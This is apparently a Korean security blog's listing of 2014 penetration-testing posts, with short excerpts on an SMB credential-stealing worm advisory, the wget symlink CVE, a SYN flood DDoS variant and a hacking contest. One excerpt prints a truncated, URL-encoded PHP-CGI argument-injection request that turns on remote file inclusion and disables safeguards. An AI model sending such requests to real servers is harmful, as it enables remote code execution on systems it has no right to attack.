본문 바로가기

모의해킹 (WAPT)170

공유 폴더와 시스템의 아이디 및 패스워드를 탈취하는 SMB 웜 도구 주의 개요최근 미국 영화社 해킹 사고에서 SMB 웜 도구를 이용하여 공유 폴더 및 시스템의 아이디 및 패스워드가 유출됨에 따라 국내 출현 가능성에 대비 주의 필요[1]영향 받는 소프트웨어Microsoft Windows 모든 운영체제해결 방안사용자의 경우, 악성코드로 인한 피해 예방을 위해 백신을 설치하고 최신 업데이트 상태로 유지취약점을 통해 악성코드가 전파되는 것을 방지하기 위해 운영체제와 응용 프로그램을 최신 업데이트 상태로 유지공유 폴더 사용을 자제하고 취약한 패스워드보다는 영문, 숫자, 특수문자를 조합한 8자리 이상의 비밀번호 설정 권고기업 시스템 관리자의 경우, 444번 및 445번 포트 모니터링 및 해당 SMB 웜 도구를 이용하여 전파되는 하드디스크 파괴형 악성코드에 의한 시스템 파괴에 대비하여 정.. 2014. 12. 29.

Wget FTP Symlink Attack Vulnerability http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html [Bug-wget] GNU wget 1.16 releasedIt is available for download here: ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz and the GPG detached signatures using the key E163E1EA: ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig To reduce load.. 2014. 10. 31.

새로운 형태의 디도스 공격 발견 ‘Tsunami SYN Flood Attack’ 패킷당 1000bytes의 트래픽 유발일반적인 SYN 패킷 25배 크기로 패킷 데이터양 추가해 공격http://www.boannews.com/media/view.asp?idx=43654&skind=O ▲공격대상별 공격비율Tsunami SYN-Flood Attack은 주로 ISP나 게임 회사의 데이터센터를 공격했으며 4~5Gbps의 공격이 발생했다. 기존 SYN flood Attack은 패킷당 40~60bytes의 트래픽을 유발하는데 반해 Tsunami SYN-Flood Attack은 패킷당 1000bytes의 트래픽을 유발한다.[출처]1. http://itsecuritynews.info/2014/10/12/tsunami-syn-flood-ddos-attac.. 2014. 10. 28.

제11회 해킹방어대회 개최 한국인터넷진흥원에서는 해킹사고에 대한 대응능력 향상을 위해 다음과 같이 「제11회 해킹방어대회」를 개최합니다. □ 참가대상 및 방법 o 참가대상 : 국내 모든 정보보호 담당자, 화이트해커(1개 팀당 4명 이하로 팀원 구성, 내국인으로 제한) o 참가신청 : 2014. 10. 1(수) 09:00 ~ 2014. 10. 15(수) 18:00까지 홈페이지를 통해 신청(http://hdcon.kisa.or.kr) o 기타 문의처 : hdcon@kisa.or.kr □ 대회 내용 o 개요 - 주최 : 미래창조과학부 - 주관 : 한국인터넷진흥원 - 협찬 : Microsoft, Symantec, CDNetworks o 예선 대회 - 1부 : 2014. 10. 18(토) 10:00 ~ 18:00 (8시간), 온라인 문제풀.. 2014. 9. 30.

쉘코드 웹공격 사례 샘플 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68.. 2014. 9. 4.

이전 1 2 3 4 5 6 7 ··· 34 다음

티스토리툴바